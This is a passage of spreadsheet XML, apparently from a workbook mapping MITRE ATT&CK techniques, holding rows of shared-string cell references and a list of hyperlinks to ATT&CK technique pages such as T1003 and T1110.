      <c r="B172" s="2" t="s">
        <v>498</v>
      </c>
      <c r="C172" s="4" t="s">
        <v>666</v>
      </c>
    </row>
    <row r="173" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A173" s="2" t="s">
        <v>499</v>
      </c>
      <c r="B173" s="2" t="s">
        <v>500</v>
      </c>
      <c r="C173" s="4" t="s">
        <v>501</v>
      </c>
    </row>
    <row r="174" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A174" s="2" t="s">
        <v>33</v>
      </c>
      <c r="B174" s="2" t="s">
        <v>502</v>
      </c>
      <c r="C174" s="4" t="s">
        <v>667</v>
      </c>
    </row>
    <row r="175" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A175" s="2" t="s">
        <v>21</v>
      </c>
      <c r="B175" s="2" t="s">
        <v>503</v>
      </c>
      <c r="C175" s="2" t="s">
        <v>504</v>
      </c>
    </row>
    <row r="176" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A176" s="2" t="s">
        <v>505</v>
      </c>
      <c r="B176" s="2" t="s">
        <v>506</v>
      </c>
      <c r="C176" s="4" t="s">
        <v>668</v>
      </c>
    </row>
    <row r="177" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A177" s="2" t="s">
        <v>507</v>
      </c>
      <c r="B177" s="2" t="s">
        <v>508</v>
      </c>
      <c r="C177" s="4" t="s">
        <v>509</v>
      </c>
    </row>
    <row r="178" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A178" s="2" t="s">
        <v>510</v>
      </c>
      <c r="B178" s="2" t="s">
        <v>511</v>
      </c>
      <c r="C178" s="2" t="s">
        <v>512</v>
      </c>
    </row>
    <row r="179" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A179" s="2" t="s">
        <v>513</v>
      </c>
      <c r="B179" s="2" t="s">
        <v>514</v>
      </c>
      <c r="C179" s="4" t="s">
        <v>515</v>
      </c>
    </row>
    <row r="180" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A180" s="2" t="s">
        <v>516</v>
      </c>
      <c r="B180" s="2" t="s">
        <v>517</v>
      </c>
      <c r="C180" s="4" t="s">
        <v>518</v>
      </c>
    </row>
    <row r="181" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A181" s="2" t="s">
        <v>519</v>
      </c>
      <c r="B181" s="2" t="s">
        <v>520</v>
      </c>
      <c r="C181" s="4" t="s">
        <v>521</v>
      </c>
    </row>
    <row r="182" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A182" s="2" t="s">
        <v>522</v>
      </c>
      <c r="B182" s="2" t="s">
        <v>523</v>
      </c>
      <c r="C182" s="4" t="s">
        <v>524</v>
      </c>
    </row>
    <row r="183" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A183" s="2" t="s">
        <v>525</v>
      </c>
      <c r="B183" s="2" t="s">
        <v>526</v>
      </c>
      <c r="C183" s="4" t="s">
        <v>527</v>
      </c>
    </row>
    <row r="184" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A184" s="2" t="s">
        <v>528</v>
      </c>
      <c r="B184" s="2" t="s">
        <v>529</v>
      </c>
      <c r="C184" s="4" t="s">
        <v>669</v>
      </c>
    </row>
    <row r="185" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A185" s="2" t="s">
        <v>530</v>
      </c>
      <c r="B185" s="2" t="s">
        <v>531</v>
      </c>
      <c r="C185" s="4" t="s">
        <v>532</v>
      </c>
    </row>
    <row r="186" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A186" s="2" t="s">
        <v>533</v>
      </c>
      <c r="B186" s="2" t="s">
        <v>534</v>
      </c>
      <c r="C186" s="2" t="s">
        <v>535</v>
      </c>
    </row>
    <row r="187" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A187" s="2" t="s">
        <v>536</v>
      </c>
      <c r="B187" s="2" t="s">
        <v>537</v>
      </c>
      <c r="C187" s="4" t="s">
        <v>538</v>
      </c>
    </row>
    <row r="188" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A188" s="2" t="s">
        <v>539</v>
      </c>
      <c r="B188" s="2" t="s">
        <v>540</v>
      </c>
      <c r="C188" s="4" t="s">
        <v>541</v>
      </c>
    </row>
    <row r="189" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A189" s="2" t="s">
        <v>542</v>
      </c>
      <c r="B189" s="2" t="s">
        <v>543</v>
      </c>
      <c r="C189" s="4" t="s">
        <v>544</v>
      </c>
    </row>
    <row r="190" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A190" s="2" t="s">
        <v>545</v>
      </c>
      <c r="B190" s="2" t="s">
        <v>546</v>
      </c>
      <c r="C190" s="4" t="s">
        <v>547</v>
      </c>
    </row>
    <row r="191" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A191" s="2" t="s">
        <v>548</v>
      </c>
      <c r="B191" s="2" t="s">
        <v>549</v>
      </c>
      <c r="C191" s="4" t="s">
        <v>550</v>
      </c>
    </row>
    <row r="192" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A192" s="2" t="s">
        <v>551</v>
      </c>
      <c r="B192" s="2" t="s">
        <v>552</v>
      </c>
      <c r="C192" s="4" t="s">
        <v>553</v>
      </c>
    </row>
    <row r="193" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A193" s="2" t="s">
        <v>554</v>
      </c>
      <c r="B193" s="2" t="s">
        <v>555</v>
      </c>
      <c r="C193" s="4" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="194" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A194" s="2" t="s">
        <v>556</v>
      </c>
      <c r="B194" s="2" t="s">
        <v>557</v>
      </c>
      <c r="C194" s="4" t="s">
        <v>671</v>
      </c>
    </row>
    <row r="195" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A195" s="2" t="s">
        <v>558</v>
      </c>
      <c r="B195" s="2" t="s">
        <v>559</v>
      </c>
      <c r="C195" s="4" t="s">
        <v>672</v>
      </c>
    </row>
    <row r="196" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A196" s="2" t="s">
        <v>560</v>
      </c>
      <c r="B196" s="2" t="s">
        <v>561</v>
      </c>
      <c r="C196" s="4" t="s">
        <v>562</v>
      </c>
    </row>
    <row r="197" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A197" s="2" t="s">
        <v>563</v>
      </c>
      <c r="B197" s="2" t="s">
        <v>564</v>
      </c>
      <c r="C197" s="4" t="s">
        <v>565</v>
      </c>
    </row>
    <row r="198" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A198" s="2" t="s">
        <v>4</v>
      </c>
      <c r="B198" s="2" t="s">
        <v>566</v>
      </c>
      <c r="C198" s="4" t="s">
        <v>567</v>
      </c>
    </row>
    <row r="199" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A199" s="2" t="s">
        <v>6</v>
      </c>
      <c r="B199" s="2" t="s">
        <v>568</v>
      </c>
      <c r="C199" s="4" t="s">
        <v>673</v>
      </c>
    </row>
    <row r="200" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A200" s="2" t="s">
        <v>8</v>
      </c>
      <c r="B200" s="2" t="s">
        <v>569</v>
      </c>
      <c r="C200" s="4" t="s">
        <v>570</v>
      </c>
    </row>
    <row r="201" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A201" s="2" t="s">
        <v>5</v>
      </c>
      <c r="B201" s="2" t="s">
        <v>571</v>
      </c>
      <c r="C201" s="2" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="202" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A202" s="2" t="s">
        <v>573</v>
      </c>
      <c r="B202" s="2" t="s">
        <v>574</v>
      </c>
      <c r="C202" s="4" t="s">
        <v>674</v>
      </c>
    </row>
    <row r="203" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A203" s="2" t="s">
        <v>575</v>
      </c>
      <c r="B203" s="2" t="s">
        <v>576</v>
      </c>
      <c r="C203" s="4" t="s">
        <v>577</v>
      </c>
    </row>
    <row r="204" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A204" s="2" t="s">
        <v>578</v>
      </c>
      <c r="B204" s="2" t="s">
        <v>579</v>
      </c>
      <c r="C204" s="4" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="205" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A205" s="2" t="s">
        <v>581</v>
      </c>
      <c r="B205" s="2" t="s">
        <v>582</v>
      </c>
      <c r="C205" s="4" t="s">
        <v>583</v>
      </c>
    </row>
    <row r="206" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A206" s="2" t="s">
        <v>584</v>
      </c>
      <c r="B206" s="2" t="s">
        <v>585</v>
      </c>
      <c r="C206" s="4" t="s">
        <v>586</v>
      </c>
    </row>
    <row r="207" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A207" s="2" t="s">
        <v>587</v>
      </c>
      <c r="B207" s="2" t="s">
        <v>588</v>
      </c>
      <c r="C207" s="4" t="s">
        <v>589</v>
      </c>
    </row>
    <row r="208" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A208" s="2" t="s">
        <v>590</v>
      </c>
      <c r="B208" s="2" t="s">
        <v>591</v>
      </c>
      <c r="C208" s="2" t="s">
        <v>592</v>
      </c>
    </row>
    <row r="209" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A209" s="2" t="s">
        <v>593</v>
      </c>
      <c r="B209" s="2" t="s">
        <v>594</v>
      </c>
      <c r="C209" s="4" t="s">
        <v>675</v>
      </c>
    </row>
    <row r="210" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A210" s="2" t="s">
        <v>595</v>
      </c>
      <c r="B210" s="2" t="s">
        <v>596</v>
      </c>
      <c r="C210" s="4" t="s">
        <v>597</v>
      </c>
    </row>
    <row r="211" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A211" s="2" t="s">
        <v>598</v>
      </c>
      <c r="B211" s="2" t="s">
        <v>599</v>
      </c>
      <c r="C211" s="4" t="s">
        <v>600</v>
      </c>
    </row>
    <row r="212" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A212" s="2" t="s">
        <v>601</v>
      </c>
      <c r="B212" s="2" t="s">
        <v>602</v>
      </c>
      <c r="C212" s="4" t="s">
        <v>603</v>
      </c>
    </row>
    <row r="213" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A213" s="2" t="s">
        <v>604</v>
      </c>
      <c r="B213" s="2" t="s">
        <v>605</v>
      </c>
      <c r="C213" s="4" t="s">
        <v>606</v>
      </c>
    </row>
    <row r="214" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A214" s="2" t="s">
        <v>607</v>
      </c>
      <c r="B214" s="2" t="s">
        <v>608</v>
      </c>
      <c r="C214" s="4" t="s">
        <v>676</v>
      </c>
    </row>
    <row r="215" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A215" s="2" t="s">
        <v>609</v>
      </c>
      <c r="B215" s="2" t="s">
        <v>610</v>
      </c>
      <c r="C215" s="4" t="s">
        <v>611</v>
      </c>
    </row>
    <row r="216" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A216" s="2" t="s">
        <v>612</v>
      </c>
      <c r="B216" s="2" t="s">
        <v>613</v>
      </c>
      <c r="C216" s="4" t="s">
        <v>614</v>
      </c>
    </row>
    <row r="217" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A217" s="2" t="s">
        <v>615</v>
      </c>
      <c r="B217" s="2" t="s">
        <v>616</v>
      </c>
      <c r="C217" s="4" t="s">
        <v>617</v>
      </c>
    </row>
    <row r="218" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A218" s="2" t="s">
        <v>618</v>
      </c>
      <c r="B218" s="2" t="s">
        <v>619</v>
      </c>
      <c r="C218" s="4" t="s">
        <v>620</v>
      </c>
    </row>
    <row r="219" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A219" s="2" t="s">
        <v>13</v>
      </c>
      <c r="B219" s="2" t="s">
        <v>621</v>
      </c>
      <c r="C219" s="4" t="s">
        <v>677</v>
      </c>
    </row>
    <row r="220" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A220" s="2" t="s">
        <v>622</v>
      </c>
      <c r="B220" s="2" t="s">
        <v>623</v>
      </c>
      <c r="C220" s="4" t="s">
        <v>624</v>
      </c>
    </row>
    <row r="221" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A221" s="2" t="s">
        <v>625</v>
      </c>
      <c r="B221" s="2" t="s">
        <v>626</v>
      </c>
      <c r="C221" s="4" t="s">
        <v>627</v>
      </c>
    </row>
    <row r="222" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A222" s="2" t="s">
        <v>628</v>
      </c>
      <c r="B222" s="2" t="s">
        <v>629</v>
      </c>
      <c r="C222" s="4" t="s">
        <v>678</v>
      </c>
    </row>
    <row r="223" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A223" s="2" t="s">
        <v>630</v>
      </c>
      <c r="B223" s="2" t="s">
        <v>631</v>
      </c>
      <c r="C223" s="4" t="s">
        <v>679</v>
      </c>
    </row>
    <row r="224" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A224" s="2" t="s">
        <v>632</v>
      </c>
      <c r="B224" s="2" t="s">
        <v>633</v>
      </c>
      <c r="C224" s="4" t="s">
        <v>634</v>
      </c>
    </row>
  </sheetData>
  <hyperlinks>
    <hyperlink ref="A2" r:id="rId1" display="https://attack.mitre.org/techniques/T1156" xr:uid="{C0221BEE-F97A-984D-AA69-5E2FB45FCFF5}"/>
    <hyperlink ref="B2" r:id="rId2" display="https://attack.mitre.org/techniques/T1156" xr:uid="{52AF875F-245F-4442-9EA9-D6D1D37F1ADD}"/>
    <hyperlink ref="A3" r:id="rId3" display="https://attack.mitre.org/techniques/T1134" xr:uid="{0DD251A8-C15E-B545-925A-001223E372D4}"/>
    <hyperlink ref="B3" r:id="rId4" display="https://attack.mitre.org/techniques/T1134" xr:uid="{95D287B3-289D-6340-BF32-E50DD95DE167}"/>
    <hyperlink ref="A4" r:id="rId5" display="https://attack.mitre.org/techniques/T1015" xr:uid="{00620A16-9D87-B14F-9366-ABB59776038F}"/>
    <hyperlink ref="B4" r:id="rId6" display="https://attack.mitre.org/techniques/T1015" xr:uid="{73469F90-F979-5A45-97C9-607BC55FD72A}"/>
    <hyperlink ref="A5" r:id="rId7" display="https://attack.mitre.org/techniques/T1087" xr:uid="{F42E7EF0-43FB-854E-A21E-A7D7E415FB50}"/>
    <hyperlink ref="B5" r:id="rId8" display="https://attack.mitre.org/techniques/T1087" xr:uid="{719BC964-277B-8B47-8743-7CC3CA1BCB0E}"/>
    <hyperlink ref="A6" r:id="rId9" display="https://attack.mitre.org/techniques/T1098" xr:uid="{DB76F017-8BD7-B649-9E2B-3AC55A05CCA9}"/>
    <hyperlink ref="B6" r:id="rId10" display="https://attack.mitre.org/techniques/T1098" xr:uid="{F28071D9-DC27-E740-A487-AB6DB7E3D7BE}"/>
    <hyperlink ref="A7" r:id="rId11" display="https://attack.mitre.org/techniques/T1182" xr:uid="{A36E0F9F-450D-0A49-A4BD-6F4ED21AB67F}"/>
    <hyperlink ref="B7" r:id="rId12" display="https://attack.mitre.org/techniques/T1182" xr:uid="{B5171AE4-BBFF-C94B-ACF2-52FF240806E6}"/>
    <hyperlink ref="A8" r:id="rId13" display="https://attack.mitre.org/techniques/T1103" xr:uid="{99787322-F125-3B4E-9DF2-BE32AC512710}"/>
    <hyperlink ref="B8" r:id="rId14" display="https://attack.mitre.org/techniques/T1103" xr:uid="{AAAD4D7D-ADF2-4E40-BC07-1556588676FF}"/>
    <hyperlink ref="C8" r:id="rId15" display="https://attack.mitre.org/techniques/T1055" xr:uid="{5C57B986-7548-8141-970B-919D992D2294}"/>
    <hyperlink ref="A9" r:id="rId16" display="https://attack.mitre.org/techniques/T1155" xr:uid="{817075B8-69DF-2C46-977A-00A9EB93B582}"/>
    <hyperlink ref="B9" r:id="rId17" display="https://attack.mitre.org/techniques/T1155" xr:uid="{F7D4233F-9F47-D74D-87D2-39581F3445AA}"/>
    <hyperlink ref="A10" r:id="rId18" display="https://attack.mitre.org/techniques/T1017" xr:uid="{195358F3-BB05-D541-8844-A33B5927D675}"/>
    <hyperlink ref="B10" r:id="rId19" display="https://attack.mitre.org/techniques/T1017" xr:uid="{E8D23B1A-0E91-234C-AB05-BC3EA77CAE8A}"/>
    <hyperlink ref="A11" r:id="rId20" display="https://attack.mitre.org/techniques/T1138" xr:uid="{431C8ABA-6BF9-3644-BCF9-49DF814C88BD}"/>
    <hyperlink ref="B11" r:id="rId21" display="https://attack.mitre.org/techniques/T1138" xr:uid="{FC96D680-0BAB-7E40-B2D1-9E2EFD023A98}"/>
    <hyperlink ref="C11" r:id="rId22" display="https://attack.mitre.org/techniques/T1179" xr:uid="{551663A1-DF3D-5C44-BCC9-F03A9D78BA1A}"/>
    <hyperlink ref="A12" r:id="rId23" display="https://attack.mitre.org/techniques/T1010" xr:uid="{71AFB136-B723-434E-A646-2D692AF1BD19}"/>
    <hyperlink ref="B12" r:id="rId24" display="https://attack.mitre.org/techniques/T1010" xr:uid="{90A87760-97BA-3F43-AFC3-F39B51C10915}"/>
    <hyperlink ref="A13" r:id="rId25" display="https://attack.mitre.org/techniques/T1123" xr:uid="{AC1D4164-7626-104A-AE98-4DA001B9D007}"/>
    <hyperlink ref="B13" r:id="rId26" display="https://attack.mitre.org/techniques/T1123" xr:uid="{F308A245-24E4-2845-B6E1-54D23987AF94}"/>
    <hyperlink ref="A14" r:id="rId27" display="https://attack.mitre.org/techniques/T1131" xr:uid="{997BC56B-87F0-C542-9B74-54B5BACE8697}"/>
    <hyperlink ref="B14" r:id="rId28" display="https://attack.mitre.org/techniques/T1131" xr:uid="{C4C1ACC6-7E3F-2941-96C7-3AFEE3F0D24B}"/>
    <hyperlink ref="A15" r:id="rId29" display="https://attack.mitre.org/techniques/T1119" xr:uid="{56318F5B-5F1E-B142-9D21-1A224DE143E4}"/>
    <hyperlink ref="B15" r:id="rId30" display="https://attack.mitre.org/techniques/T1119" xr:uid="{B754B6D7-9EB8-904C-A885-97BA35693296}"/>
    <hyperlink ref="C15" r:id="rId31" display="https://attack.mitre.org/techniques/T1064" xr:uid="{DEE8B8B9-670E-F74E-BD1B-F67F681C5F38}"/>
    <hyperlink ref="A16" r:id="rId32" display="https://attack.mitre.org/techniques/T1020" xr:uid="{2C346066-9C53-D047-B80E-F3879BDC8646}"/>
    <hyperlink ref="B16" r:id="rId33" display="https://attack.mitre.org/techniques/T1020" xr:uid="{F3B6407E-057A-284A-ABFF-23CA676F3B97}"/>
    <hyperlink ref="C16" r:id="rId34" display="https://attack.mitre.org/techniques/T1064" xr:uid="{2CA219A9-3F68-1247-AFEB-7266458E05EA}"/>
    <hyperlink ref="A17" r:id="rId35" display="https://attack.mitre.org/techniques/T1139" xr:uid="{87DBF45A-FB3D-EA4A-8925-A23F8717498A}"/>
    <hyperlink ref="B17" r:id="rId36" display="https://attack.mitre.org/techniques/T1139" xr:uid="{FD299B64-8DC6-4444-955B-C4F6EAA7CEAF}"/>
    <hyperlink ref="A18" r:id="rId37" display="https://attack.mitre.org/techniques/T1009" xr:uid="{27D86273-D208-494C-B431-C4186934FF8B}"/>
    <hyperlink ref="B18" r:id="rId38" display="https://attack.mitre.org/techniques/T1009" xr:uid="{FE28BCC8-D26A-B24A-ACEC-8727C2CC24FD}"/>
    <hyperlink ref="A19" r:id="rId39" display="https://attack.mitre.org/techniques/T1197" xr:uid="{6A3A8A1C-9B4D-1147-AD31-33F3D100D340}"/>
    <hyperlink ref="B19" r:id="rId40" display="https://attack.mitre.org/techniques/T1197" xr:uid="{4EBFC817-9A1F-EC48-8634-C8991A6CBC8F}"/>
    <hyperlink ref="A20" r:id="rId41" display="https://attack.mitre.org/techniques/T1067" xr:uid="{128ED9A9-349F-B24F-B96D-CB6185127866}"/>
    <hyperlink ref="B20" r:id="rId42" display="https://attack.mitre.org/techniques/T1067" xr:uid="{78C2D62E-AE25-B649-BCF8-428D44271EC6}"/>
    <hyperlink ref="A21" r:id="rId43" display="https://attack.mitre.org/techniques/T1217" xr:uid="{07041C78-1EAC-444E-9C16-2E6B11F1E534}"/>
    <hyperlink ref="B21" r:id="rId44" display="https://attack.mitre.org/techniques/T1217" xr:uid="{C4775956-8F0C-B040-82CB-FF05752349A1}"/>
    <hyperlink ref="A22" r:id="rId45" display="https://attack.mitre.org/techniques/T1176" xr:uid="{DDF5B2A4-C9F9-6B47-B5DA-CC521319246C}"/>
    <hyperlink ref="B22" r:id="rId46" display="https://attack.mitre.org/techniques/T1176" xr:uid="{FEC09F4C-9B41-7340-805F-FF1A7648BB0C}"/>
    <hyperlink ref="A23" r:id="rId47" display="https://attack.mitre.org/techniques/T1110" xr:uid="{B3638EA2-0EC3-494E-8C40-B2A10240FBDD}"/>
    <hyperlink ref="B23" r:id="rId48" display="https://attack.mitre.org/techniques/T1110" xr:uid="{46387EED-54C8-1940-B05F-A6AC1C641F0E}"/>
    <hyperlink ref="A24" r:id="rId49" display="https://attack.mitre.org/techniques/T1088" xr:uid="{F64AC372-1F3D-E04B-86C4-E79A9963832A}"/>
    <hyperlink ref="B24" r:id="rId50" display="https://attack.mitre.org/techniques/T1088" xr:uid="{49D18D9E-966B-B947-AF5F-FE42B100F6C7}"/>
    <hyperlink ref="A25" r:id="rId51" display="https://attack.mitre.org/techniques/T1042" xr:uid="{59423752-CABE-014F-9B6E-E46E83F8FA55}"/>
    <hyperlink ref="B25" r:id="rId52" display="https://attack.mitre.org/techniques/T1042" xr:uid="{6453F78B-597F-5F41-87C8-F879965D1446}"/>
    <hyperlink ref="A26" r:id="rId53" display="https://attack.mitre.org/techniques/T1146" xr:uid="{A0454723-0059-584B-921E-278E855D1FC1}"/>
    <hyperlink ref="B26" r:id="rId54" display="https://attack.mitre.org/techniques/T1146" xr:uid="{0EA3A2DE-8CE5-C64E-A85F-7BE8AEAB36D6}"/>
    <hyperlink ref="A27" r:id="rId55" display="https://attack.mitre.org/techniques/T1115" xr:uid="{8964B9CF-3FCC-CB41-A62F-C04EE912B78A}"/>
    <hyperlink ref="B27" r:id="rId56" display="https://attack.mitre.org/techniques/T1115" xr:uid="{7647025D-5A4E-6044-9BE2-D61A256A402C}"/>
    <hyperlink ref="A28" r:id="rId57" display="https://attack.mitre.org/techniques/T1191" xr:uid="{2BDA6A14-584E-D048-A2AE-AADA9ABAC4E6}"/>
    <hyperlink ref="B28" r:id="rId58" display="https://attack.mitre.org/techniques/T1191" xr:uid="{54DA3FAC-0258-EC47-9137-E7C6EB584405}"/>
    <hyperlink ref="A29" r:id="rId59" display="https://attack.mitre.org/techniques/T1116" xr:uid="{0665C383-6590-1641-9660-27717FE422C7}"/>
    <hyperlink ref="B29" r:id="rId60" display="https://attack.mitre.org/techniques/T1116" xr:uid="{F12E28F0-2B96-FC43-952C-E378ADB403B2}"/>
    <hyperlink ref="A30" r:id="rId61" display="https://attack.mitre.org/techniques/T1059" xr:uid="{1F0533C5-9276-9A4D-9D2F-A6BEE3E9F64D}"/>
    <hyperlink ref="B30" r:id="rId62" display="https://attack.mitre.org/techniques/T1059" xr:uid="{74541554-4018-4F46-BFD3-3E4388AD1FF0}"/>
    <hyperlink ref="A31" r:id="rId63" display="https://attack.mitre.org/techniques/T1043" xr:uid="{D663A471-9FF0-B449-8E60-6E36E7B97610}"/>
    <hyperlink ref="B31" r:id="rId64" display="https://attack.mitre.org/techniques/T1043" xr:uid="{6AA96159-F3C5-B049-A3B8-9577A5A2C803}"/>
    <hyperlink ref="A32" r:id="rId65" display="https://attack.mitre.org/techniques/T1092" xr:uid="{2C1B7EE3-521B-1048-80FF-0FE645226EA8}"/>
    <hyperlink ref="B32" r:id="rId66" display="https://attack.mitre.org/techniques/T1092" xr:uid="{9B5373A3-0314-DD4C-B8B4-C57787328B74}"/>
    <hyperlink ref="C32" r:id="rId67" display="https://attack.mitre.org/techniques/T1091" xr:uid="{476A555C-FA58-0645-A8A9-0FC48308211D}"/>
    <hyperlink ref="A33" r:id="rId68" display="https://attack.mitre.org/techniques/T1223" xr:uid="{2B6FFE89-BEAE-CF48-89F3-4BE5FA11D898}"/>
    <hyperlink ref="B33" r:id="rId69" display="https://attack.mitre.org/techniques/T1223" xr:uid="{768DD1FC-5FC5-1244-91A7-D1FF79214581}"/>
    <hyperlink ref="A34" r:id="rId70" display="https://attack.mitre.org/techniques/T1109" xr:uid="{290B129A-A583-EB45-845E-1B92C2E1B94B}"/>
    <hyperlink ref="B34" r:id="rId71" display="https://attack.mitre.org/techniques/T1109" xr:uid="{A86D783F-BE1F-5E4B-A483-DD9C8DCBF0A4}"/>
    <hyperlink ref="C34" r:id="rId72" display="https://attack.mitre.org/techniques/T1019" xr:uid="{B005DF11-CD82-7944-8FCB-1F2F4B65F070}"/>
    <hyperlink ref="A35" r:id="rId73" display="https://attack.mitre.org/techniques/T1122" xr:uid="{2149E75A-CBA6-1749-A508-F2B4FC656C2E}"/>
    <hyperlink ref="B35" r:id="rId74" display="https://attack.mitre.org/techniques/T1122" xr:uid="{266E77E2-DBDE-CA43-98F9-F1CE0B655D50}"/>
    <hyperlink ref="A36" r:id="rId75" display="https://attack.mitre.org/techniques/T1090" xr:uid="{7A082AC9-15EA-7543-9C24-194F99F6EFD3}"/>
    <hyperlink ref="B36" r:id="rId76" display="https://attack.mitre.org/techniques/T1090" xr:uid="{FC4EEEE1-C30F-D14D-95D1-5D857F1AAADC}"/>
    <hyperlink ref="C36" r:id="rId77" display="https://attack.mitre.org/software/S0040" xr:uid="{5E62FBA1-A6D2-8B47-B69D-FDF083BCD820}"/>
    <hyperlink ref="A37" r:id="rId78" display="https://attack.mitre.org/techniques/T1196" xr:uid="{2356551C-C458-4C45-91F0-52E41E4FC096}"/>
    <hyperlink ref="B37" r:id="rId79" display="https://attack.mitre.org/techniques/T1196" xr:uid="{86BBD78A-A82A-ED4D-8186-A79963AE540C}"/>
    <hyperlink ref="A38" r:id="rId80" display="https://attack.mitre.org/techniques/T1136" xr:uid="{CF6E4E18-393E-ED4D-88A8-A55055887184}"/>
    <hyperlink ref="B38" r:id="rId81" display="https://attack.mitre.org/techniques/T1136" xr:uid="{C46BE837-7660-A54A-AC9A-39852BBB8757}"/>
    <hyperlink ref="A39" r:id="rId82" display="https://attack.mitre.org/techniques/T1003" xr:uid="{77F19EAA-71DB-2144-BBBF-B812D847C8CA}"/>
    <hyperlink ref="B39" r:id="rId83" display="https://attack.mitre.org/techniques/T1003" xr:uid="{4DFE15AC-1CE2-E648-B901-9B1106C60122}"/>
    <hyperlink ref="A40" r:id="rId84" display="https://attack.mitre.org/techniques/T1081" xr:uid="{6B09EB28-C9D6-A94A-96D5-8B095F8D09F5}"/>
    <hyperlink ref="B40" r:id="rId85" display="https://attack.mitre.org/techniques/T1081" xr:uid="{849D382C-0ABB-6246-8C5B-04C995129685}"/>
    <hyperlink ref="A41" r:id="rId86" display="https://attack.mitre.org/techniques/T1214" xr:uid="{27F426A5-793F-C043-B54C-65465593754C}"/>
    <hyperlink ref="B41" r:id="rId87" display="https://attack.mitre.org/techniques/T1214" xr:uid="{CD2A233F-CF29-5A4C-A0E2-5A9C1E5DE7E3}"/>
    <hyperlink ref="A42" r:id="rId88" display="https://attack.mitre.org/techniques/T1094" xr:uid="{050B60B2-2B00-0B4E-A512-753ABB658C36}"/>
    <hyperlink ref="B42" r:id="rId89" display="https://attack.mitre.org/techniques/T1094" xr:uid="{85F90688-03B7-D246-95F3-5DCE969C168D}"/>
    <hyperlink ref="C42" r:id="rId90" display="https://attack.mitre.org/techniques/T1071" xr:uid="{68AAD83B-B1F9-2F49-A660-6D2D11E7A0BA}"/>
    <hyperlink ref="A43" r:id="rId91" display="https://attack.mitre.org/techniques/T1024" xr:uid="{FE0C77CA-6BBF-7D4C-B7B8-E45726003DDB}"/>
    <hyperlink ref="B43" r:id="rId92" display="https://attack.mitre.org/techniques/T1024" xr:uid="{69656780-5DA0-8247-969B-EAF69B5D6273}"/>
    <hyperlink ref="A44" r:id="rId93" display="https://attack.mitre.org/techniques/T1002" xr:uid="{0390145A-A442-014D-955B-DE33FCE2E9C2}"/>
    <hyperlink ref="B44" r:id="rId94" display="https://attack.mitre.org/techniques/T1002" xr:uid="{924D660E-CCF9-BC4C-A00D-CF9540F0B49B}"/>
    <hyperlink ref="A45" r:id="rId95" display="https://attack.mitre.org/techniques/T1132" xr:uid="{4D9A686C-124F-584A-B40E-850AE6216C02}"/>
    <hyperlink ref="B45" r:id="rId96" display="https://attack.mitre.org/techniques/T1132" xr:uid="{086AE98C-0E78-D544-B056-B3E1E1DC687A}"/>
    <hyperlink ref="A46" r:id="rId97" display="https://attack.mitre.org/techniques/T1022" xr:uid="{1D5C864D-7E16-C248-BE0B-D8C81967D0EA}"/>
    <hyperlink ref="B46" r:id="rId98" display="https://attack.mitre.org/techniques/T1022" xr:uid="{C257B4E6-6C03-3C48-A09E-A9AE02A2900E}"/>
    <hyperlink ref="A47" r:id="rId99" display="https://attack.mitre.org/techniques/T1213" xr:uid="{BA18F47E-B4A8-214B-971C-04002CAC9DB3}"/>
    <hyperlink ref="B47" r:id="rId100" display="https://attack.mitre.org/techniques/T1213" xr:uid="{45F3CD89-4D84-FF40-BCFE-4D402B3B28DB}"/>
    <hyperlink ref="A48" r:id="rId101" display="https://attack.mitre.org/techniques/T1005" xr:uid="{3110B8F4-3E7A-AE4F-A7E5-D62D2225FAF2}"/>
    <hyperlink ref="B48" r:id="rId102" display="https://attack.mitre.org/techniques/T1005" xr:uid="{51477613-F5F9-7E4D-9495-7F20D93A4822}"/>
